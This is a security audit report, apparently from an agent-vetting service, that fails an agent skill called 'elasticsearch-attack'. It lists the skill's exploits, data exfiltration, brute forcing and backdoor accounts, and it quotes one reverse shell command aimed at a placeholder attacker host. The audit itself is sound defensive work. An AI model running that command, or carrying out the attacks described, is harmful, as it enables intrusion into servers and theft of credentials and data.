elasticsearch-attack

Fail

Audited by Gen Agent Trust Hub on Aug 12, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFE
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The documentation includes functional payloads for several known vulnerabilities (CVE-2014-3120, CVE-2015-1427, and CVE-2019-7609) that allow arbitrary command execution on Elasticsearch and Kibana servers.
  • [REMOTE_CODE_EXECUTION]: Contains a Base64-encoded reverse shell command (bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1) designed to establish an interactive connection between the target server and an attacker-controlled host.
  • [DATA_EXFILTRATION]: Provides detailed procedures for enumerating and bulk-exporting entire database indices to external servers, specifically targeting sensitive fields such as passwords, tokens, and credit card numbers.
  • [COMMAND_EXECUTION]: The skill includes instructions for utilizing network scanners (nmap), brute-forcing tools (hydra), and directory traversal payloads to identify services and read sensitive system files like /etc/passwd.
  • [CREDENTIALS_UNSAFE]: Instructions are provided for creating backdoor superuser accounts and generating API keys to maintain long-term, unauthorized access to the target cluster.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Aug 12, 2026, 03:49 PM
Security Audit — agent-trust-hub — elasticsearch-attack